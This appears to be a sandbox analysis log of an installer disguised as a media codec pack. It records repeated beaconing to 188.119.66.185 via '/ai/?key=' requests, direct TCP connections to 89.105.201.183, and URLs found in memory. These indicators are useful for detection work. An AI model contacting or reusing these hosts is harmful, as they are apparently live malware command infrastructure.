                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 89.105.201.183
                    Source: unknownTCP traffic detected without corresponding DNS query: 89.105.201.183
                    Source: unknownTCP traffic detected without corresponding DNS query: 89.105.201.183
                    Source: unknownTCP traffic detected without corresponding DNS query: 89.105.201.183
                    Source: unknownTCP traffic detected without corresponding DNS query: 89.105.201.183
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 89.105.201.183
                    Source: unknownTCP traffic detected without corresponding DNS query: 89.105.201.183
                    Source: unknownTCP traffic detected without corresponding DNS query: 89.105.201.183
                    Source: unknownTCP traffic detected without corresponding DNS query: 89.105.201.183
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_02D02B95 WSASetLastError,WSARecv,WSASetLastError,select,3_2_02D02B95
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b82a8dcd6c946851e30088813250aa158405633775b0e650f0ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fd13484 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b82a8dcd6c946851e30088813250aa158405633775b0e650f0ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fd13484 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: newwork.exe.1.tmp, 00000001.00000002.2575850575.0000000005ADC000.00000004.00001000.00020000.00000000.sdmp, mediacodecpack.exe, 00000003.00000000.1337100436.00000000004D2000.00000002.00000001.01000000.00000009.sdmp, MediaCodecPack.exe.3.dr, mediacodecpack.exe.1.dr, is-D6CVE.tmp.1.drString found in binary or memory: http://wonderwork.ucoz.com/
                    Source: newwork.exe.1.tmp, newwork.exe.1.tmp, 00000001.00000000.1326674876.0000000000401000.00000020.00000001.01000000.00000004.sdmp, newwork.exe.1.tmp.0.dr, is-P1HNB.tmp.1.drString found in binary or memory: http://www.innosetup.com/
                    Source: newwork.exe.1.exeString found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline
                    Source: newwork.exe.1.exeString found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
                    Source: newwork.exe.1.exe, 00000000.00000003.1326087653.0000000002310000.00000004.00001000.00020000.00000000.sdmp, newwork.exe.1.exe, 00000000.00000003.1326248808.00000000020E8000.00000004.00001000.00020000.00000000.sdmp, newwork.exe.1.tmp, newwork.exe.1.tmp, 00000001.00000000.1326674876.0000000000401000.00000020.00000001.01000000.00000004.sdmp, newwork.exe.1.tmp.0.dr, is-P1HNB.tmp.1.drString found in binary or memory: http://www.remobjects.com/ps
                    Source: newwork.exe.1.exe, 00000000.00000003.1326087653.0000000002310000.00000004.00001000.00020000.00000000.sdmp, newwork.exe.1.exe, 00000000.00000003.1326248808.00000000020E8000.00000004.00001000.00020000.00000000.sdmp, newwork.exe.1.tmp, 00000001.00000000.1326674876.0000000000401000.00000020.00000001.01000000.00000004.sdmp, newwork.exe.1.tmp.0.dr, is-P1HNB.tmp.1.drString found in binary or memory: http://www.remobjects.com/psU
                    Source: mediacodecpack.exe, 00000003.00000002.2576046673.0000000003370000.00000004.00000020.00020000.00000000.sdmp, mediacodecpack.exe, 00000003.00000002.2572840058.0000000000AB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/
                    Source: mediacodecpack.exe, 00000003.00000002.2576046673.0000000003370000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/779CB9834B480E8EE1B8DFF231005E9DC5D8267
                    Source: mediacodecpack.exe, 00000003.00000002.2576046673.0000000003370000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/PTKa
                    Source: mediacodecpack.exe, 00000003.00000002.2572840058.0000000000AB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/S
                    Source: mediacodecpack.exe, 00000003.00000002.2576046673.0000000003370000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/ai/?key=8
                    Source: mediacodecpack.exe, 00000003.00000002.2572840058.0000000000AC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b82a8dcd6c946851e3008881325
                    Source: mediacodecpack.exe, 00000003.00000002.2572840058.0000000000A8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4
                    Source: mediacodecpack.exe, 00000003.00000002.2572840058.0000000000AB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/e
                    Source: mediacodecpack.exe, 00000003.00000002.2572840058.0000000000AB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/en-GB
                    Source: mediacodecpack.exe, 00000003.00000002.2572840058.0000000000AB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/en-US
                    Source: mediacodecpack.exe, 00000003.00000002.2576046673.0000000003370000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/ography
                    Source: newwork.exe.1.exe, 00000000.00000003.1325798542.00000000020E1000.00000004.00001000.00020000.00000000.sdmp, newwork.exe.1.exe, 00000000.00000003.1325714956.0000000002310000.00000004.00001000.00020000.00000000.sdmp, newwork.exe.1.exe, 00000000.00000002.2573166725.00000000020E1000.00000004.00001000.00020000.00000000.sdmp, newwork.exe.1.tmp, 00000001.00000003.1327471325.00000000031F0000.00000004.00001000.00020000.00000000.sdmp, newwork.exe.1.tmp, 00000001.00000003.1327811982.00000000021B8000.00000004.00001000.00020000.00000000.sdmp, newwork.exe.1.tmp, 00000001.00000002.2574636674.00000000021B8000.00000004.00001000.00020000.00000000.sdmp, newwork.exe.1.tmp, 00000001.00000002.2573405234.0000000000857000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.easycutstudio.com/support.html
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
